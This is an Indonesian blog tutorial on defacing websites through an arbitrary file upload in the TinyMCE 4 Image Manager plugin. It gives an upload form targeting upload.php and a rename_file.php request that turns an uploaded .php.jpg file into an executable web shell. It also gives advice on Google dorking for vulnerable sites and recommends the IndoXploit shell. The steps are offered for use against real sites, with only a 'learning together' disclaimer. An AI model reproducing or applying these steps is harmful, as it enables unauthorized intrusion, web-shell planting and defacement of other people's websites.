Deface Metode TinyMCE 4 Image Manager With CSRF

Deface Metode TinyMCE 4 Image Manager With CSRF

Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode TinyMCE 4 Image Manager With CSRF

Thanks to Typical Idiot Security
Author TinyMCE 4 Image Manager=Khunerable
Author CSRF=Anoaghost

Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit aja

-Script Deface (Saya rasa udah punya sendiri sendiri)

-CSRF
<form enctype="multipart/form-data" action="site.com/path/tinymce/plugins/image/upload.php" method="post"><input type="file" name="upl" multiple="multiple"><input type="submit" value="Proccess!"></form>
-Setelah Upload shel
sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php 
-Exploit
PATH/tinymce/plugins/image/upload.php

(Upload.php ganti dulu menjadi image.php biar kita tau apakah bisa upload gambar atau tidak) Jika bisa baru ganti menjadi upload.php
1. Dorking dulu di Google (Mana tau dapat yg vuln)
2. Jika sudah masukkan exploit di atas
Contoh
site.co.li/PATH/tinymce/plugins/image/upload.php
3. Ambil csrfnya dan ubah di bagian sitenya
4. Simpan dengan format html seperti adewa.html
5. Click CSRF tersebut dan upload shell kalian dengan format php.jpg, Jika sukses akan ada seperti ini


6. Jika sudah masukkan exploit yg ke dua untuk merubah nama format shel kita. Bagian current_name=adewa.php.jpg adalah shel yg saya upload tadi
Shel tersebut akan kita ubah menjadi .php dengan cara bagian paling akhir new_name= ubah menjadi php
Seperti adewa.php
new_name=adewa.php


Jika sukses merubah akan ada seperti ini


7. Untuk mengakses shel kalian
site.com/tinymce/plugins/image/uploads/namashelkalian.php


Mungkin itulah sedikit penjelasan mengenai "Deface Metode TinyMCE 4 Image Manager With CSRF"
Jika kurang paham kalian bisa bertanya di bawah ini

Jika kurang paham nonton aja video di bawah ini


Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb

0 Response to "Deface Metode TinyMCE 4 Image Manager With CSRF"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel